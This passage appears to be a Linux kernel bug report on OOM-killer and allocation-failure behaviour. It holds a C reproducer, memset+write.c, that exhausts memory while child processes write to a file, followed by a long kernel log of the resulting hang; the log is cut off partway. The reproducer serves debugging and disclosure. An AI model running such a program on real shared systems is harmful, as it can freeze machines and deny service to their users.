Likewise, failing filesystem read/write due to failing subcontractor's memory allocation results in a damage to contractors (application). For example, the content written by asynchronous write requests will be lost.
Therefore, we don't want the kernel to willingly deny subcontractors' / sub-sub contractors' allocation requests because of not invoking the OOM killer ···.
It seems that we can reproduce by concurrently running a process which consumes all memory using malloc() + memset() and a process which consumes a little memory by doing asynchronous file writes.
---------- memset+write.c ---------- #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int main(int argc, char *argv[]) { unsigned long size; char *buf = NULL; unsigned long i; for (i = 0; i < 10; i++) { if (fork() == 0) { static char buf[4096]; const int fd = open("/tmp/file", O_CREAT | O_WRONLY | O_APPEND, 0600); while (write(fd, buf, sizeof(buf)) == sizeof(buf)); pause(); _exit(0); } } for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } sleep(5); /* Will cause OOM due to overcommit */ for (i = 0; i < size; i += 4096) buf[i] = 0; pause(); return 0; } ---------- memset+write.c ----------
---------- Example output start ---------- [ 67.776733] memset+write invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 [ 67.778409] memset+write cpuset=/ mems_allowed=0 [ 67.779310] CPU: 1 PID: 4158 Comm: memset+write Not tainted 3.10.0-327.18.2.el7.x86_64 #1 [ 67.780988] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 67.783002] ffff88007bbadc00 0000000015e9c4b5 ffff88007b127af8 ffffffff81635a0c [ 67.784679] ffff88007b127b88 ffffffff816309ac ffff880079cd5750 ffff880079cd5768 [ 67.786253] 0000000000000206 ffff88007bbadc00 ffff88007b127b70 ffffffff81128b1f [ 67.788065] Call Trace: [ 67.788645] [<ffffffff81635a0c>] dump_stack+0x19/0x1b [ 67.789606] [<ffffffff816309ac>] dump_header+0x8e/0x214 [ 67.790620] [<ffffffff81128b1f>] ? delayacct_end+0x8f/0xb0 [ 67.791957] [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0 [ 67.793085] [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0 [ 67.794515] [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30 [ 67.795730] [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0 [ 67.796792] [<ffffffff81173ac5>] __alloc_pages_nodemask+0xa95/0xb90 [ 67.798004] [<ffffffff811b7b8a>] alloc_pages_vma+0x9a/0x140 [ 67.799125] [<ffffffff81197925>] handle_mm_fault+0xb85/0xf50 [ 67.800228] [<ffffffff8163aae8>] ? __schedule+0x2d8/0x900 [ 67.801479] [<ffffffff816416c0>] __do_page_fault+0x150/0x450 [ 67.802749] [<ffffffff816419e3>] do_page_fault+0x23/0x80 [ 67.803803] [<ffffffff8163dc48>] page_fault+0x28/0x30 [ 67.804805] Mem-Info: [ 67.805259] Node 0 DMA per-cpu: [ 67.806084] CPU 0: hi: 0, btch: 1 usd: 0 [ 67.807042] CPU 1: hi: 0, btch: 1 usd: 0 [ 67.807971] CPU 2: hi: 0, btch: 1 usd: 0 [ 67.809149] CPU 3: hi: 0, btch: 1 usd: 0 [ 67.810041] Node 0 DMA32 per-cpu: [ 67.810743] CPU 0: hi: 186, btch: 31 usd: 32 [ 67.811942] CPU 1: hi: 186, btch: 31 usd: 0 [ 67.812860] CPU 2: hi: 186, btch: 31 usd: 211 [ 67.813691] CPU 3: hi: 186, btch: 31 usd: 50 [ 67.814633] active_anon:385124 inactive_anon:2096 isolated_anon:0 [ 67.814633] active_file:6184 inactive_file:9766 isolated_file:0 [ 67.814633] unevictable:0 dirty:552 writeback:9326 unstable:0 [ 67.814633] free:15848 slab_reclaimable:4962 slab_unreclaimable:5615 [ 67.814633] mapped:5933 shmem:2161 pagetables:2108 bounce:0 [ 67.814633] free_cma:0 [ 67.822567] Node 0 DMA free:7432kB min:400kB low:500kB high:600kB active_anon:7240kB inactive_anon:0kB active_file:200kB inactive_file:148kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:204kB mapped:184kB shmem:0kB slab_reclaimable:112kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:27 all_unreclaimable? no [ 67.831956] lowmem_reserve[]: 0 1720 1720 1720 [ 67.833707] Node 0 DMA32 free:53824kB min:44652kB low:55812kB high:66976kB active_anon:1533256kB inactive_anon:8384kB active_file:24536kB inactive_file:40900kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:1840kB writeback:39308kB mapped:23548kB shmem:8644kB slab_reclaimable:19736kB slab_unreclaimable:22300kB kernel_stack:6528kB pagetables:8140kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:448 all_unreclaimable? no [ 67.844988] lowmem_reserve[]: 0 0 0 0 [ 67.846636] Node 0 DMA: 22*4kB (UEM) 13*8kB (UEM) 11*16kB (UEM) 4*32kB (UEM) 2*64kB (EM) 1*128kB (E) 2*256kB (UM) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7408kB [ 67.851731] Node 0 DMA32: 941*4kB (UE) 693*8kB (UEM) 270*16kB (UEM) 216*32kB (UE) 117*64kB (UEM) 52*128kB (UEM) 27*256kB (UEM) 8*512kB (EM) 3*1024kB (M) 1*2048kB (M) 0*4096kB = 50812kB [ 67.857304] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 67.859927] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 67.862160] 19726 total pagecache pages [ 67.863651] 0 pages in swap cache [ 67.865041] Swap cache stats: add 0, delete 0, find 0/0 [ 67.866736] Free swap = 0kB [ 67.868016] Total swap = 0kB [ 67.869295] 524157 pages RAM [ 67.870684] 0 pages HighMem/MovableOnly [ 67.872163] 79320 pages reserved [ 67.873467] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 67.875840] [ 588] 0 588 9204 680 19 0 0 systemd-journal [ 67.878421] [ 604] 0 604 10814 485 21 0 -1000 systemd-udevd [ 67.878422] [ 912] 0 912 12803 451 25 0 -1000 auditd [ 67.878424] [ 1967] 70 1967 6997 389 18 0 0 avahi-daemon [ 67.878425] [ 1979] 0 1979 72391 1429 42 0 0 rsyslogd [ 67.878426] [ 1982] 0 1982 80896 5753 78 0 0 firewalld [ 67.878427] [ 1983] 0 1983 4829 316 14 0 0 irqbalance [ 67.878428] [ 1984] 0 1984 6612 435 15 0 0 systemd-logind [ 67.878429] [ 1985] 81 1985 6672 465 18 0 -900 dbus-daemon [ 67.878430] [ 1990] 70 1990 6997 58 17 0 0 avahi-daemon [ 67.878431] [ 2015] 0 2015 52593 1356 56 0 0 abrtd [ 67.878433] [ 2017] 0 2017 51993 1133 54 0 0 abrt-watch-log [ 67.878434] [ 2018] 0 2018 1094 148 8 0 0 rngd [ 67.878435] [ 2044] 0 2044 31583 393 21 0 0 crond [ 67.878436] [ 2181] 0 2181 46752 1141 41 0 0 vmtoolsd [ 67.878438] [ 2803] 0 2803 27631 3192 51 0 0 dhclient [ 67.878439] [ 2807] 999 2807 132051 3450 54 0 0 polkitd [ 67.878440] [ 2890] 0 2890 20640 900 40 0 -1000 sshd [ 67.878441] [ 2893] 0 2893 138262 4089 91 0 0 tuned [ 67.878442] [ 4096] 0 4096 22785 519 42 0 0 master [ 67.878443] [ 4102] 0 4102 64751 2099 57 0 -900 abrt-dbus [ 67.878445] [ 4108] 0 4108 23201 674 51 0 0 login [ 67.878445] [ 4109] 0 4109 27509 214 12 0 0 agetty [ 67.878446] [ 4113] 0 4113 79455 691 104 0 0 nmbd [ 67.878447] [ 4115] 89 4115 22811 976 44 0 0 pickup [ 67.878448] [ 4116] 89 4116 22828 984 45 0 0 qmgr [ 67.878450] [ 4130] 0 4130 96508 1392 138 0 0 smbd [ 67.878451] [ 4134] 0 4134 96508 735 132 0 0 smbd [ 67.878452] [ 4137] 1000 4137 28884 534 14 0 0 bash [ 67.878454] [ 4158] 1000 4158 541715 366511 725 0 0 memset+write [ 67.878455] [ 4159] 1000 4159 1042 21 6 0 0 memset+write [ 67.878456] [ 4160] 1000 4160 1042 21 6 0 0 memset+write [ 67.878457] [ 4161] 1000 4161 1042 21 6 0 0 memset+write [ 67.878458] [ 4162] 1000 4162 1042 21 6 0 0 memset+write [ 67.878459] [ 4163] 1000 4163 1042 21 6 0 0 memset+write [ 67.878460] [ 4164] 1000 4164 1042 21 6 0 0 memset+write [ 67.878461] [ 4165] 1000 4165 1042 21 6 0 0 memset+write [ 67.878461] [ 4166] 1000 4166 1042 21 6 0 0 memset+write [ 67.878462] [ 4167] 1000 4167 1042 21 6 0 0 memset+write [ 67.878463] [ 4168] 1000 4168 1042 21 6 0 0 memset+write [ 67.878464] Out of memory: Kill process 4158 (memset+write) score 825 or sacrifice child [ 67.878467] Killed process 4159 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB [ 68.333885] memset+write invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0 [ 68.335891] memset+write cpuset=/ mems_allowed=0 [ 68.337124] CPU: 0 PID: 4158 Comm: memset+write Not tainted 3.10.0-327.18.2.el7.x86_64 #1 [ 68.339035] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 68.341410] ffff88007bbadc00 0000000015e9c4b5 ffff88007b127af8 ffffffff81635a0c [ 68.343326] ffff88007b127b88 ffffffff816309ac ffff880079cd5750 ffff880079cd5768 [ 68.345256] 0000000000000206 ffff88007bbadc00 ffff88007b127b70 ffffffff81128b1f [ 68.347163] Call Trace: [ 68.348064] [<ffffffff81635a0c>] dump_stack+0x19/0x1b [ 68.349439] [<ffffffff816309ac>] dump_header+0x8e/0x214 [ 68.350859] [<ffffffff81128b1f>] ? delayacct_end+0x8f/0xb0 [ 68.352320] [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0 [ 68.353847] [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0 [ 68.355373] [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30 [ 68.357016] [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0 [ 68.358503] [<ffffffff81173ac5>] __alloc_pages_nodemask+0xa95/0xb90 [ 68.360124] [<ffffffff811b7b8a>] alloc_pages_vma+0x9a/0x140 [ 68.361635] [<ffffffff81197925>] handle_mm_fault+0xb85/0xf50 [ 68.363147] [<ffffffff8163aae8>] ? __schedule+0x2d8/0x900 [ 68.364612] [<ffffffff816416c0>] __do_page_fault+0x150/0x450 [ 68.366144] [<ffffffff816419e3>] do_page_fault+0x23/0x80 [ 68.367616] [<ffffffff8163dc48>] page_fault+0x28/0x30 [ 68.369019] Mem-Info: [ 68.369890] Node 0 DMA per-cpu: [ 68.370979] CPU 0: hi: 0, btch: 1 usd: 0 [ 68.372543] CPU 1: hi: 0, btch: 1 usd: 0 [ 68.373900] CPU 2: hi: 0, btch: 1 usd: 0 [ 68.375258] CPU 3: hi: 0, btch: 1 usd: 0 [ 68.376576] Node 0 DMA32 per-cpu: [ 68.377683] CPU 0: hi: 186, btch: 31 usd: 0 [ 68.379041] CPU 1: hi: 186, btch: 31 usd: 0 [ 68.380402] CPU 2: hi: 186, btch: 31 usd: 0 [ 68.381744] CPU 3: hi: 186, btch: 31 usd: 33 [ 68.383107] active_anon:404397 inactive_anon:2096 isolated_anon:0 [ 68.383107] active_file:82 inactive_file:0 isolated_file:0 [ 68.383107] unevictable:0 dirty:2 writeback:64 unstable:0 [ 68.383107] free:12956 slab_reclaimable:4712 slab_unreclaimable:5666 [ 68.383107] mapped:489 shmem:2161 pagetables:2146 bounce:0 [ 68.383107] free_cma:0 [ 68.391582] Node 0 DMA free:7272kB min:400kB low:500kB high:600kB active_anon:7948kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:40kB mapped:16kB shmem:0kB slab_reclaimable:52kB slab_unreclaimable:164kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 68.400580] lowmem_reserve[]: 0 1720 1720 1720 [ 68.402208] Node 0 DMA32 free:44552kB min:44652kB low:55812kB high:66976kB active_anon:1609640kB inactive_anon:8384kB active_file:328kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:8kB writeback:216kB mapped:1940kB shmem:8644kB slab_reclaimable:18796kB slab_unreclaimable:22500kB kernel_stack:6528kB pagetables:8292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2005 all_unreclaimable? yes [ 68.412886] lowmem_reserve[]: 0 0 0 0 [ 68.414465] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB [ 68.419424] Node 0 DMA32: 910*4kB (UEM) 568*8kB (UEM) 153*16kB (UEM) 151*32kB (UE) 94*64kB (UEM) 58*128kB (UEM) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44776kB [ 68.424683] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 68.427106] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 68.429457] 2258 total pagecache pages [ 68.430956] 0 pages in swap cache [ 68.432384] Swap cache stats: add 0, delete 0, find 0/0 [ 68.434187] Free swap = 0kB [ 68.435545] Total swap = 0kB [ 68.436865] 524157 pages RAM [ 68.438225] 0 pages HighMem/MovableOnly [ 68.439698] 79320 pages reserved [ 68.441072] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 68.443320] [ 588] 0 588 9204 395 19 0 0 systemd-journal [ 68.445710] [ 604] 0 604 10814 176 21 0 -1000 systemd-udevd [ 68.448100] [ 912] 0 912 12803 122 25 0 -1000 auditd [ 68.450370] [ 1967] 70 1967 6997 63 18 0 0 avahi-daemon [ 68.452736] [ 1979] 0 1979 72391 926 42 0 0 rsyslogd [ 68.455063] [ 1982] 0 1982 80896 4270 78 0 0 firewalld [ 68.457297] [ 1983] 0 1983 4829 87 14 0 0 irqbalance [ 68.459638] [ 1984] 0 1984 6612 86 15 0 0 systemd-logind [ 68.462043] [ 1985] 81 1985 6672 128 18 0 -900 dbus-daemon [ 68.464379] [ 1990] 70 1990 6997 58 17 0 0 avahi-daemon [ 68.466708] [ 2015] 0 2015 52593 433 56 0 0 abrtd [ 68.468963] [ 2017] 0 2017 51993 352 54 0 0 abrt-watch-log [ 68.471530] [ 2018] 0 2018 1094 24 8 0 0 rngd [ 68.473807] [ 2044] 0 2044 31583 155 21 0 0 crond [ 68.476153] [ 2181] 0 2181 46752 262 41 0 0 vmtoolsd [ 68.478435] [ 2803] 0 2803 27631 3114 51 0 0 dhclient [ 68.480782] [ 2807] 999 2807 132051 2260 54 0 0 polkitd [ 68.483093] [ 2890] 0 2890 20640 222 40 0 -1000 sshd [ 68.485357] [ 2893] 0 2893 138262 2668 91 0 0 tuned [ 68.487615] [ 4096] 0 4096 22785 252 42 0 0 master [ 68.489912] [ 4102] 0 4102 64751 1000 57 0 -900 abrt-dbus [ 68.492253] [ 4108] 0 4108 23201 170 51 0 0 login [ 68.494525] [ 4109] 0 4109 27509 37 12 0 0 agetty [ 68.496785] [ 4113] 0 4113 79455 358 104 0 0 nmbd [ 68.499056] [ 4115] 89 4115 22811 253 44 0 0 pickup [ 68.501186] [ 4116] 89 4116 22828 250 45 0 0 qmgr [ 68.503333] [ 4130] 0 4130 96508 528 138 0 0 smbd [ 68.505438] [ 4134] 0 4134 96508 528 132 0 0 smbd [ 68.507535] [ 4137] 1000 4137 28884 134 14 0 0 bash [ 68.509598] [ 4158] 1000 4158 541715 385692 763 0 0 memset+write [ 68.511764] [ 4160] 1000 4160 1042 21 6 0 0 memset+write [ 68.513959] [ 4161] 1000 4161 1042 21 6 0 0 memset+write [ 68.515999] [ 4162] 1000 4162 1042 21 6 0 0 memset+write [ 68.518104] [ 4163] 1000 4163 1042 21 6 0 0 memset+write [ 68.520170] [ 4164] 1000 4164 1042 21 6 0 0 memset+write [ 68.522145] [ 4165] 1000 4165 1042 21 6 0 0 memset+write [ 68.524082] [ 4166] 1000 4166 1042 21 6 0 0 memset+write [ 68.526037] [ 4167] 1000 4167 1042 21 6 0 0 memset+write [ 68.527964] [ 4168] 1000 4168 1042 21 6 0 0 memset+write [ 68.529921] Out of memory: Kill process 4158 (memset+write) score 868 or sacrifice child [ 68.531913] Killed process 4160 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB (Since no response, I pressed SysRq-m in order to show memory state.) [ 104.136563] SysRq : Show Memory [ 104.137695] Mem-Info: [ 104.138539] Node 0 DMA per-cpu: [ 104.139591] CPU 0: hi: 0, btch: 1 usd: 0 [ 104.141033] CPU 1: hi: 0, btch: 1 usd: 0 [ 104.142328] CPU 2: hi: 0, btch: 1 usd: 0 [ 104.143600] CPU 3: hi: 0, btch: 1 usd: 0 [ 104.144856] Node 0 DMA32 per-cpu: [ 104.145869] CPU 0: hi: 186, btch: 31 usd: 30 [ 104.147112] CPU 1: hi: 186, btch: 31 usd: 32 [ 104.148358] CPU 2: hi: 186, btch: 31 usd: 1 [ 104.149592] CPU 3: hi: 186, btch: 31 usd: 30 [ 104.150827] active_anon:404558 inactive_anon:2096 isolated_anon:0 [ 104.150827] active_file:0 inactive_file:0 isolated_file:0 [ 104.150827] unevictable:0 dirty:0 writeback:0 unstable:0 [ 104.150827] free:12924 slab_reclaimable:4632 slab_unreclaimable:5619 [ 104.150827] mapped:404 shmem:2161 pagetables:2162 bounce:0 [ 104.150827] free_cma:0 [ 104.158594] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 104.168335] lowmem_reserve[]: 0 1720 1720 1720 [ 104.169812] Node 0 DMA32 free:44432kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes [ 104.179790] lowmem_reserve[]: 0 0 0 0 [ 104.181210] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB [ 104.185866] Node 0 DMA32: 868*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44432kB [ 104.190836] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 104.193159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 104.195439] 2162 total pagecache pages [ 104.196881] 0 pages in swap cache [ 104.198244] Swap cache stats: add 0, delete 0, find 0/0 [ 104.199974] Free swap = 0kB [ 104.201274] Total swap = 0kB [ 104.202577] 524157 pages RAM [ 104.203874] 0 pages HighMem/MovableOnly [ 104.205345] 79320 pages reserved (I again pressed SysRq-m in order to show memory state. But the situation did not improve.) [ 146.547225] SysRq : Show Memory [ 146.548766] Mem-Info: [ 146.549982] Node 0 DMA per-cpu: [ 146.551486] CPU 0: hi: 0, btch: 1 usd: 0 [ 146.553161] CPU 1: hi: 0, btch: 1 usd: 0 [ 146.554827] CPU 2: hi: 0, btch: 1 usd: 0 [ 146.556593] CPU 3: hi: 0, btch: 1 usd: 0 [ 146.558288] Node 0 DMA32 per-cpu: [ 146.559676] CPU 0: hi: 186, btch: 31 usd: 30 [ 146.561395] CPU 1: hi: 186, btch: 31 usd: 59 [ 146.563010] CPU 2: hi: 186, btch: 31 usd: 1 [ 146.564634] CPU 3: hi: 186, btch: 31 usd: 30 [ 146.566325] active_anon:404558 inactive_anon:2096 isolated_anon:0 [ 146.566325] active_file:0 inactive_file:0 isolated_file:0 [ 146.566325] unevictable:0 dirty:0 writeback:0 unstable:0 [ 146.566325] free:12893 slab_reclaimable:4632 slab_unreclaimable:5619 [ 146.566325] mapped:404 shmem:2161 pagetables:2162 bounce:0 [ 146.566325] free_cma:0 [ 146.576409] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 146.585972] lowmem_reserve[]: 0 1720 1720 1720 [ 146.587814] Node 0 DMA32 free:44308kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes [ 146.599568] lowmem_reserve[]: 0 0 0 0 [ 146.601198] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB [ 146.606977] Node 0 DMA32: 837*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44308kB [ 146.612321] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 146.614753] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 146.617125] 2162 total pagecache pages [ 146.618674] 0 pages in swap cache [ 146.620106] Swap cache stats: add 0, delete 0, find 0/0 [ 146.621893] Free swap = 0kB [ 146.623225] Total swap = 0kB [ 146.624538] 524157 pages RAM [ 146.625970] 0 pages HighMem/MovableOnly [ 146.627442] 79320 pages reserved (I pressed SysRq-f in order to invoke the OOM killer. But it did not help.) [ 153.523099] SysRq : Manual OOM execution [ 153.524763] kworker/0:1 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0 [ 153.526884] kworker/0:1 cpuset=/ mems_allowed=0 [ 153.528593] CPU: 0 PID: 163 Comm: kworker/0:1 Not tainted 3.10.0-327.18.2.el7.x86_64 #1 [ 153.530840] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 153.533615] Workqueue: events moom_callback [ 153.535183] ffff88007bf73980 00000000dc64ad72 ffff88007ba4fc70 ffffffff81635a0c [ 153.537555] ffff88007ba4fd00 ffffffff816309ac ffffffff81daaa00 ffffffff81a30200 [ 153.539950] 00000000ffff8200 ffff88007ba4fca8 ffffffff8108bec3 ffff88007ba4fcc8 [ 153.542293] Call Trace: [ 153.543642] [<ffffffff81635a0c>] dump_stack+0x19/0x1b [ 153.545381] [<ffffffff816309ac>] dump_header+0x8e/0x214 [ 153.547324] [<ffffffff8108bec3>] ? __internal_add_timer+0x113/0x130 [ 153.549338] [<ffffffff8108bf12>] ? internal_add_timer+0x32/0x70 [ 153.551278] [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0 [ 153.553271] [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0 [ 153.555223] [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30 [ 153.557296] [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0 [ 153.559240] [<ffffffff813b9f0d>] moom_callback+0x4d/0x50 [ 153.561106] [<ffffffff8109d5fb>] process_one_work+0x17b/0x470 [ 153.563087] [<ffffffff8109e3cb>] worker_thread+0x11b/0x400 [ 153.564985] [<ffffffff8109e2b0>] ? rescuer_thread+0x400/0x400 [ 153.566970] [<ffffffff810a5aef>] kthread+0xcf/0xe0 [ 153.568698] [<ffffffff810a5a20>] ? kthread_create_on_node+0x140/0x140 [ 153.570730] [<ffffffff81646118>] ret_from_fork+0x58/0x90 [ 153.572598] [<ffffffff810a5a20>] ? kthread_create_on_node+0x140/0x140 [ 153.574643] Mem-Info: [ 153.575900] Node 0 DMA per-cpu: [ 153.577241] CPU 0: hi: 0, btch: 1 usd: 0 [ 153.578865] CPU 1: hi: 0, btch: 1 usd: 0 [ 153.580424] CPU 2: hi: 0, btch: 1 usd: 0 [ 153.582002] CPU 3: hi: 0, btch: 1 usd: 0 [ 153.583554] Node 0 DMA32 per-cpu: [ 153.584864] CPU 0: hi: 186, btch: 31 usd: 30 [ 153.586334] CPU 1: hi: 186, btch: 31 usd: 59 [ 153.587830] CPU 2: hi: 186, btch: 31 usd: 1 [ 153.589286] CPU 3: hi: 186, btch: 31 usd: 30 [ 153.590707] active_anon:404558 inactive_anon:2096 isolated_anon:0 [ 153.590707] active_file:0 inactive_file:0 isolated_file:0 [ 153.590707] unevictable:0 dirty:0 writeback:0 unstable:0 [ 153.590707] free:12893 slab_reclaimable:4632 slab_unreclaimable:5619 [ 153.590707] mapped:404 shmem:2161 pagetables:2162 bounce:0 [ 153.590707] free_cma:0 [ 153.599409] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 153.608512] lowmem_reserve[]: 0 1720 1720 1720 [ 153.610098] Node 0 DMA32 free:44308kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes [ 153.620715] lowmem_reserve[]: 0 0 0 0 [ 153.622939] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB [ 153.627718] Node 0 DMA32: 837*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44308kB [ 153.632880] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 153.635206] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 153.637597] 2162 total pagecache pages [ 153.639022] 0 pages in swap cache [ 153.640456] Swap cache stats: add 0, delete 0, find 0/0 [ 153.642204] Free swap = 0kB [ 153.643552] Total swap = 0kB [ 153.644892] 524157 pages RAM [ 153.646150] 0 pages HighMem/MovableOnly [ 153.647650] 79320 pages reserved [ 153.649047] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 153.651334] [ 588] 0 588 9204 387 19 0 0 systemd-journal [ 153.653757] [ 604] 0 604 10814 170 21 0 -1000 systemd-udevd [ 153.656237] [ 912] 0 912 12803 115 25 0 -1000 auditd [ 153.658523] [ 1967] 70 1967 6997 63 18 0 0 avahi-daemon [ 153.660967] [ 1979] 0 1979 72391 919 42 0 0 rsyslogd [ 153.663275] [ 1982] 0 1982 80896 4252 78 0 0 firewalld [ 153.665703] [ 1983] 0 1983 4829 76 14 0 0 irqbalance [ 153.668042] [ 1984] 0 1984 6612 79 15 0 0 systemd-logind [ 153.670465] [ 1985] 81 1985 6672 122 18 0 -900 dbus-daemon [ 153.672794] [ 1990] 70 